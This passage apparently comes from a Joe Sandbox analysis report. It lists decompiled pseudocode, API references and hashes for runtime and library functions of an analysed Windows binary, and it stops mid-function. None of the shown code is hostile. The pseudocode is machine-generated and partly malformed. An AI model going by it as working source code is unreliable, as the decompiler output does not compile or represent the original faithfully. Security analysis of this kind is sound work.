				signed int _t62;
				signed int _t63;
				void* _t64;

				_t61 =  *((intOrPtr*)(_t64 - 0x18));
				_t62 =  *(_t64 - 0x20);
				_t49 = 0xffff;
				while(1) {
					_t29 =  *((intOrPtr*)(_t64 + 8));
					 *((intOrPtr*)(_t64 - 4)) = 0;
					 *((char*)(_t64 - 0x11)) = 1;
					 *((char*)(_t64 - 4)) = 1;
					_t50 = _t29;
					if(_t49 != _t62) {
						_t30 = E00CAACB0(_t50);
					} else {
						_t30 = E00CAAC8D(_t50);
					}
					_t62 = _t30 & 0x0000ffff;
					 *((intOrPtr*)(_t64 - 4)) = 0;
					 *(_t64 - 0x20) = _t62;
					if(0xffff == _t62) {
						break;
					}
					 *((char*)(_t64 - 4)) = 3;
					_t46 = E00CAAD38( *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4)) + _t61 + 0x38)), _t62); // executed
					_t49 = 0xffff;
					if(0xffff != (_t46 & 0x0000ffff)) {
						continue;
					} else {
						_t63 = 4;
						_t51 =  *(_t64 - 0x1c) | _t63;
						 *((char*)(_t64 - 4)) = 0;
					}
					L10:
					_t34 =  *((intOrPtr*)( *_t61 + 4));
					 *((intOrPtr*)(_t34 + _t61 + 0x20)) = 0;
					 *((intOrPtr*)(_t34 + _t61 + 0x24)) = 0;
					_t52 =  ==  ? _t51 | 0x00000002 : _t51;
					_t53 =  ==  ? _t63 :  ==  ? _t51 | 0x00000002 : _t51;
					_t39 =  *((intOrPtr*)( *_t61 + 4)) + _t61;
					 *((intOrPtr*)(_t64 + 8)) = _t39;
					if(_t53 != 0) {
						_t60 =  ==  ?  *(_t39 + 0xc) | _t53 | _t63 :  *(_t39 + 0xc) | _t53;
						_t39 = E00CA77A4( *((intOrPtr*)(_t64 + 8)),  ==  ?  *(_t39 + 0xc) | _t53 | _t63 :  *(_t39 + 0xc) | _t53, 0);
					}
					E00CA4F71(_t39, _t64 - 0x28);
					0xe2149e();
					return _t61;
				}
				_t51 =  *(_t64 - 0x1c);
				_t63 = 4;
				goto L10;
			}

0x00ca5140
0x00ca5145
0x00ca5148
0x00ca514d
0x00ca514d
0x00ca5150
0x00ca5153
0x00ca50b4
0x00ca50b8
0x00ca50ba
0x00ca50c3
0x00ca50bc
0x00ca50bc
0x00ca50bc
0x00ca50cb
0x00ca50cd
0x00ca50d5
0x00ca50db
0x00000000
0x00000000
0x00ca50e4
0x00ca50ef
0x00ca50f7
0x00ca50ff
0x00000000
0x00ca5101
0x00ca5106
0x00ca5107
0x00ca5109
0x00ca5109
0x00ca5195
0x00ca5197
0x00ca519a
0x00ca519e
0x00ca51ab
0x00ca51b4
0x00ca51ba
0x00ca51bc
0x00ca51c1
0x00ca51d3
0x00ca51d7
0x00ca51d7
0x00ca51df
0x00ca51e6
0x00ca51eb
0x00ca51eb
0x00ca518b
0x00ca5194
0x00000000

APIs

std::ios_base::clear.LIBCPMT ref: 00CA51D7

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::ios_base::clear
String ID:
API String ID: 1443086396-0
Opcode ID: b5bb706a159ca195fafbe97cfda0b1d72986632b2f503e7d613a4237d29a3c8b
Instruction ID: 987f31e0c9893038ab995d4b9fbce96d1a824ab08277c8d182e6dd6174afe848
Opcode Fuzzy Hash: b5bb706a159ca195fafbe97cfda0b1d72986632b2f503e7d613a4237d29a3c8b
Instruction Fuzzy Hash: 33218C74A041569FDB14DF68C490ABDBBE1AF5A308F948069E44AEB241C734DE45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D2D7 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D0D2D7(signed int __ecx, void* __esi) {
				void* _t15;
				signed int _t17;
				intOrPtr _t18;
				signed int _t21;
				signed int _t22;
				intOrPtr* _t23;
				void* _t24;
				void* _t25;
				void* _t26;

				_t24 = __esi;
				_t20 = __ecx;
				0xe214d0(4);
				_t23 = __ecx;
				if((0 |  *((intOrPtr*)(_t26 + 8)) != 0x00000000) == 0) {
					L1:
					E00D0BD09(_t20);
				}
				if( *_t23 == 0) {
					_t17 =  *0xf0b39c; // 0xf0b368
					if(_t17 != 0) {
						L5:
						_t20 = _t17; // executed
						_t18 = E00D0D10E(_t17); // executed
						 *_t23 = _t18;
						if(_t18 == 0) {
							goto L1;
						}
					} else {
						_t20 = 0xf0b368;
						 *(_t26 - 0x10) = 0xf0b368;
						 *(_t26 - 4) =  *(_t26 - 4) & _t17;
						_t17 = E00D0D024(0xf0b368, _t24);
						 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
						 *0xf0b39c = _t17;
						if(_t17 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t21 =  *0xf0b39c; // 0xf0b368
				_t25 = E00D0D377(_t21,  *_t23);
				if(_t25 == 0) {
					_t15 =  *((intOrPtr*)(_t26 + 8))();
					_t22 =  *0xf0b39c; // 0xf0b368
					_t25 = _t15;
					E00D0D42E(_t22,  *_t23, _t25);
				}
				0xe2149e();
				return _t25;
			}

0x00d0d2d7
0x00d0d2d7
0x00d0d2de
0x00d0d2e3
0x00d0d2ef
0x00d0d2f1
0x00d0d2f1
0x00d0d2f1
0x00d0d2f9
0x00d0d2fb
0x00d0d302
0x00d0d321
0x00d0d321
0x00d0d323
0x00d0d328
0x00d0d32c
0x00000000
0x00000000
0x00d0d304
0x00d0d304
0x00d0d309
0x00d0d30c
0x00d0d30f
0x00d0d314
0x00d0d318
0x00d0d31f
0x00000000
0x00000000
0x00000000
0x00000000
0x00d0d31f
0x00d0d302
0x00d0d330
0x00d0d33b
0x00d0d33f
0x00d0d341
0x00d0d344
0x00d0d34a
0x00d0d34f
0x00d0d34f
0x00d0d356
0x00d0d35b

APIs

__EH_prolog3.LIBCMT ref: 00D0D2DE

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 68b64c3236ddb610f3492f7a9715ee466622b5b598fce836dd10a70a0add5e2d
Instruction ID: cc54c8f42f3fa3d005bd42d460148c979a2cc6bcbd3f2e06c7b1406ecf28dbd0
Opcode Fuzzy Hash: 68b64c3236ddb610f3492f7a9715ee466622b5b598fce836dd10a70a0add5e2d
Instruction Fuzzy Hash: 22012C70A00217DBDB25ABB5981276D76A2FF50360B645536E809AB2D5EF30CD10DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CA9AAE Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00CA9AB5

Part of subcall function 00CA3348: __EH_prolog3.LIBCMT ref: 00CA334F
Part of subcall function 00CA3348: std::_Lockit::_Lockit.LIBCPMT ref: 00CA3359
Part of subcall function 00CA3348: int.LIBCPMT ref: 00CA3370
Part of subcall function 00CA3348: std::locale::_Getfacet.LIBCPMT ref: 00CA3379

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3$GetfacetLockitLockit::_std::_std::locale::_
String ID:
API String ID: 326493665-0
Opcode ID: be54eef3c0316378f4e39c6c425149f97da9e2c1710cf57c0a47130b147598b2
Instruction ID: 8293433310395e33ac8c97d35fcb99e38be361654cee1bdfbd4ca5e0312d85e1
Opcode Fuzzy Hash: be54eef3c0316378f4e39c6c425149f97da9e2c1710cf57c0a47130b147598b2
Instruction Fuzzy Hash: 7001FD302003669FCB20EF789842A5AB7E9BF51308F10082EF52697252CBB2D900DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E25BEF Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00E25C32

Part of subcall function 00E29047: __getptd_noexit.LIBCMT ref: 00E29047

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: bb93ccb82d840be58efdc61a8d9248ced824db1b6a4151c987aa6587b16f078f
Instruction ID: 1a8cfb69c6f5806ea678e1bbb1e99de1f37412c5e28869381fdf6113623d2e44
Opcode Fuzzy Hash: bb93ccb82d840be58efdc61a8d9248ced824db1b6a4151c987aa6587b16f078f
Instruction Fuzzy Hash: 00F0AF32900729EBDF21AF64AD067AEB6E0AF41324F04B914B414BA192E7798A50DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00CA23D6 Relevance: 1.5, APIs: 1, Instructions: 30
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 27%

			E00CA23D6(intOrPtr* __ecx, char _a4, intOrPtr _a8) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t13;
				intOrPtr* _t14;

				_t13 = _a8;
				_t14 = __ecx;
				if(_a4 != 0 &&  *((intOrPtr*)(__ecx + 0x14)) >= 0x10) {
					_t9 =  *__ecx;
					if(_t13 != 0) {
						0xe219a0(__ecx, _t9, _t13);
					}
					_push(_t9); // executed
					_t7 = E00D0BCBD(_t7); // executed
				}
				 *((intOrPtr*)(_t14 + 0x10)) = _t13;
				 *((intOrPtr*)(_t14 + 0x14)) = 0xf;
				 *((char*)(_t13 + _t14)) = 0;
				return _t7;
			}

0x00ca23df
0x00ca23e2
0x00ca23e4
0x00ca23ed
0x00ca23f1
0x00ca23f6
0x00ca23fb
0x00ca23fe
0x00ca23ff
0x00ca2405
0x00ca2406
0x00ca2409
0x00ca2410
0x00ca2417

APIs

_memmove.LIBCMT ref: 00CA23F6

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 394a6f2ed580e98d925fb0ae83195fb2808cbbd027d7dfc278bba2a4a9ca270a
Instruction ID: f05ce387399312524db1ad5ae975acd072cbe5fe02ca36fcf162efd050387b87
Opcode Fuzzy Hash: 394a6f2ed580e98d925fb0ae83195fb2808cbbd027d7dfc278bba2a4a9ca270a
Instruction Fuzzy Hash: 84E0A232404B116BE3306F0DA800F03FBECEF82324F24002FE85A13202C7B5AA8882F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0BC90 Relevance: 1.5, APIs: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00D0BCAC

Part of subcall function 00E26445: __FF_MSGBANNER.LIBCMT ref: 00E2645C
Part of subcall function 00E26445: __NMSG_WRITE.LIBCMT ref: 00E26463
Part of subcall function 00E26445: RtlAllocateHeap.NTDLL(009C0000,00000000,00000001), ref: 00E26488

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 0ec6128ba58a948355c4a9b642cff48ded8476fe4d4b70355063a51a86cb0872
Instruction ID: 7ee48fc482a3d729148aedf5a6a21274d74365565ecbe70a30b8bc1080a8d078
Opcode Fuzzy Hash: 0ec6128ba58a948355c4a9b642cff48ded8476fe4d4b70355063a51a86cb0872
Instruction Fuzzy Hash: 7AD0173624812A67EB116AB9EC01AAA7788AA417B17080032FC08DA1D0EF61CC1057E4

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D289 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D0D289(void* __ebx, intOrPtr* __ecx, void* __esi) {
				intOrPtr* _t13;
				void* _t15;

				_t12 = __ecx;
				0xe21539(8);
				_t13 = __ecx;
				if( *__ecx == 0) {
					E00D0F0EC(__ebx, __ecx, __esi, 0x10);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t15 + 8))();
					}
					 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
					E00D0F161(_t12, 0x10);
				}
				0xe2149e();
				return  *_t13;
			}

0x00d0d289
0x00d0d290
0x00d0d295
0x00d0d29a
0x00d0d29e
0x00d0d2a3
0x00d0d2aa
0x00d0d2af
0x00d0d2af
0x00d0d2b1
0x00d0d2b7
0x00d0d2b7
0x00d0d2be
0x00d0d2c3

APIs

__EH_prolog3_catch.LIBCMT ref: 00D0D290

Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
Part of subcall function 00D0F0EC: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
Part of subcall function 00D0F0EC: RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: f7d1f8c34043b6d084ef2dc8f3cbd7cbbee0632a3f0fa23078f05c07368fcb02
Instruction ID: d08e7f8045b9c1b6c8aacf70e74909b06016f96d7843618f0b6f17a2a0909495
Opcode Fuzzy Hash: f7d1f8c34043b6d084ef2dc8f3cbd7cbbee0632a3f0fa23078f05c07368fcb02
Instruction Fuzzy Hash: BAE04F31500316EFEB607FB0C4027487760BF20721F209165E558661C1DBB089909731

Uniqueness

Uniqueness Score: -1.00%

Function 00E20C9D Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00E29D50: __lock.LIBCMT ref: 00E29D52

__onexit_nolock.LIBCMT ref: 00E20CB9

Part of subcall function 00E20CE1: RtlDecodePointer.NTDLL ref: 00E20CF4
Part of subcall function 00E20CE1: RtlDecodePointer.NTDLL ref: 00E20CFF
Part of subcall function 00E20CE1: __realloc_crt.LIBCMT ref: 00E20D40
Part of subcall function 00E20CE1: __realloc_crt.LIBCMT ref: 00E20D54
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(00000000), ref: 00E20D66
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(?), ref: 00E20D74
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(00000000), ref: 00E20D80

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: f7e079f8bee724ddd62d1ff00bb1f3d38351ef4361f0d36cd8a180225afcab35
Instruction ID: addfb3288a3f9940b2d2dff699d260d78d5979fb783b7ef50340f3b04bfa1f57
Opcode Fuzzy Hash: f7e079f8bee724ddd62d1ff00bb1f3d38351ef4361f0d36cd8a180225afcab35
Instruction Fuzzy Hash: 14D017B2D01228EBDB11BBA4E94276CB6F06F00722F506244F019B61E3CBB84A029B85

Uniqueness

Uniqueness Score: -1.00%

Function 00D32F84 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D32F84(void* __ecx, void* _a4) {
				void* _t3;
				int _t4;

				_t3 = _a4;
				if( *((intOrPtr*)(__ecx + 0x17c)) == 0) {
					 *_t3 = 0x1f4;
				}
				_t4 = SystemParametersInfoW(0x29,  *_t3, _t3, 0); // executed
				return _t4;
			}

0x00d32f8e
0x00d32f91
0x00d32f93
0x00d32f93
0x00d32fa0
0x00d32fa7

APIs

SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 00D32FA0

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: a53a8cf4ea0ad6b4d68e36e5a5cb33bef8ce5d316fecf7ca43480bc61c85d4af
Instruction ID: 646982b06f7f876751f4e1921d0904e9cf96c32871ce2d69c52bd6e960bfa629
Opcode Fuzzy Hash: a53a8cf4ea0ad6b4d68e36e5a5cb33bef8ce5d316fecf7ca43480bc61c85d4af
Instruction Fuzzy Hash: D8D012B0140204EFE7019F82DC09FB237B8EB15705F444475F6089E5A0D7B26810CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00E496F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00E49709

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 1dfd63c442ee6f5df34312e65f9932d7122762bfc4ea98b3458157e859e08f1d
Instruction ID: 08b8310e332dd83d7ddd67eb87096a43ada3102ea9ddab4fce810161ac64922c
Opcode Fuzzy Hash: 1dfd63c442ee6f5df34312e65f9932d7122762bfc4ea98b3458157e859e08f1d
Instruction Fuzzy Hash: DBC04C7255024CBBCF015FC9FC41C593BA9EB48754F044411F91C16171D773A674DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00E66675 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

APIs

mtx_do_lock.LIBCPMT ref: 00E6667D

Part of subcall function 00E664B1: GetCurrentThreadId.KERNEL32 ref: 00E664E0
Part of subcall function 00E664B1: Concurrency::critical_section::lock.LIBCMT ref: 00E664EA
Part of subcall function 00E664B1: GetCurrentThreadId.KERNEL32 ref: 00E664EF

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CurrentThread$Concurrency::critical_section::lockmtx_do_lock
String ID:
API String ID: 3783503772-0
Opcode ID: afe7df3d28b4959e0b794dc520734ee250ff84668c96b26955b8cc05fc25ab1a
Instruction ID: 84284383fb33189baa71bbd0d7c34072664010717b191442c5328ce3e8c8a618
Opcode Fuzzy Hash: afe7df3d28b4959e0b794dc520734ee250ff84668c96b26955b8cc05fc25ab1a
Instruction Fuzzy Hash: 51B0123208C30C3AEA042541FC03B043BCCD7006B0E604016F90C191D16D537451008C

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A9E6 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D1A9E6(void* __ecx) {
				int _t3;
				void* _t5;
				void* _t7;

				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t3 = DeleteObject(E00D1AA2D(_t5, __ecx, _t7)); // executed
					return _t3;
				} else {
					return 0;
				}
			}

0x00d1a9ea
0x00d1a9f5
0x00d1a9fb
0x00d1a9ec
0x00d1a9ee
0x00d1a9ee

APIs

DeleteObject.GDI32(00000000), ref: 00D1A9F5

Memory Dump Source

Source File: 00000003.00000002.564259713.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000003.00000002.564177053.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578099573.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578467470.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.578603658.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.579037806.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: DeleteObject
String ID:
API String ID: 1531683806-0
Opcode ID: 4a984f9cc9268b2f051bc072599f924a9f238adb75fa9801720ec6f2a6b6d909
Instruction ID: 7206b462c92a245475575897137bf278bd2ab86c294f2dd128995c73b3b6d44f
Opcode Fuzzy Hash: 4a984f9cc9268b2f051bc072599f924a9f238adb75fa9801720ec6f2a6b6d909
Instruction Fuzzy Hash: E5B092B0853118BEDE00A734AA0D7963554EB41306F148895E006A2002EE3985A9CAA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D37919 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D37919(intOrPtr __ecx, void* __edx, void* __fp0, WCHAR* _a4, struct HINSTANCE__* _a8) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t8;
				void* _t9;
				void* _t14;
				struct HRSRC__* _t15;
				void* _t19;
				void* _t21;
				struct HINSTANCE__* _t24;
				void* _t26;
				void* _t31;

				_t31 = __fp0;
				_t19 = __edx;
				_push(__ecx);
				_push(_t14);
				_t24 = _a8;
				_v8 = __ecx;
				if(_t24 == 0) {
					_t24 =  *(E00D0D804(_t14, _t24) + 0xc);
				}
				_t8 = FindResourceW(_t24, _a4, "PNG");
				_t15 = _t8;
				if(_t15 != 0) {
